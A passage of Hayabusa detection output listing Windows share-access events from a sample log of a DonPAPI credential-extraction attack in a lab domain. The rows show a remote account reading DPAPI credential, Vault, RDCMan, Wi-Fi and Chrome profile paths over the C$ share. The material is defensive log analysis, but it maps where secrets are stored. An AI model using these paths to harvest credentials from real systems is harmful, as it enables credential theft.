admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.686 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.686 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share 
Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.686 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.686 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.686 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.701 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.701 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share 
Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.701 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.701 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.701 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.701 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network 
Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.717 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.717 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.717 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.733 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: 
admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.733 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.733 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.748 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.748 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.748 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.748 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.748 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.765 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network 
Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.765 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Wlansvc\Profiles\Interfaces | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.765 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.765 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.765 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.780 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\Policy.vpol | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.780 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.796 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.796 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.796 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.796 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.796 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.796 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.813 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.815 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\Policy.vpol | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.702 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.702 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\154E23D0-C644-4E6F-8CE6-5069272F999F.vsch | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\2F1A6504-0641-44CF-8BB5-3612D865F2E5.vsch | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full 
extraction.evtx +2021-12-12 16:16:03.717 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.717 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.735 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\3CCD5499-87A8-4B10-A215-608888DD3B55.vsch | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.735 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.735 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 
+2021-12-12 16:16:03.750 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\system32\config\systemprofile\AppData\Local\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.750 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.750 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.750 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.750 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.766 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.766 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.766 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.766 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.766 